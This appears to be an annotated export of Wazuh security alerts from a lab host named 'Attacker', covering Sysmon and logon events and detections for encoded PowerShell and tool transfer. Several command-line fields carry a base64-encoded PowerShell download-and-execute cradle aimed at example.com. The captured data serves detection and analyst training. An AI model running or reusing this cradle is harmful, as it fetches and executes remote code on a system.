agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534235.1348677 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:12.9778604Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283516 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:12.860
ProcessGuid: {94294ddc-bd16-680a-360b-000000000e00}
ProcessId: 13184
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_yudgrlaq.1ii.ps1
CreationUtcTime: 2025-04-24 22:37:12.860
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:12.860 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd16-680a-360b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13184 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yudgrlaq.1ii.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:12.860 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534236.1351446 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:14.0705092Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43838 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534236.1358783 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:14.2143896Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43840 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 48 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534237.1366120 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:15.3032370Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283548 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:13.983
ProcessGuid: {94294ddc-bd19-680a-380b-000000000e00}
ProcessId: 14056
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd16-680a-360b-000000000e00}
ParentProcessId: 13184
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:13.983 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd19-680a-380b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14056 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd16-680a-360b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13184 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 52 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534238.1374191 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:15.8420160Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283558 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:15.808
ProcessGuid: {94294ddc-bd19-680a-380b-000000000e00}
ProcessId: 14056
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4aau3oor.h1p.ps1
CreationUtcTime: 2025-04-24 22:37:15.807
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:15.808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd19-680a-380b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14056 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4aau3oor.h1p.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:15.807 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 49 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534239.1376960 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:17.2591799Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283599 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
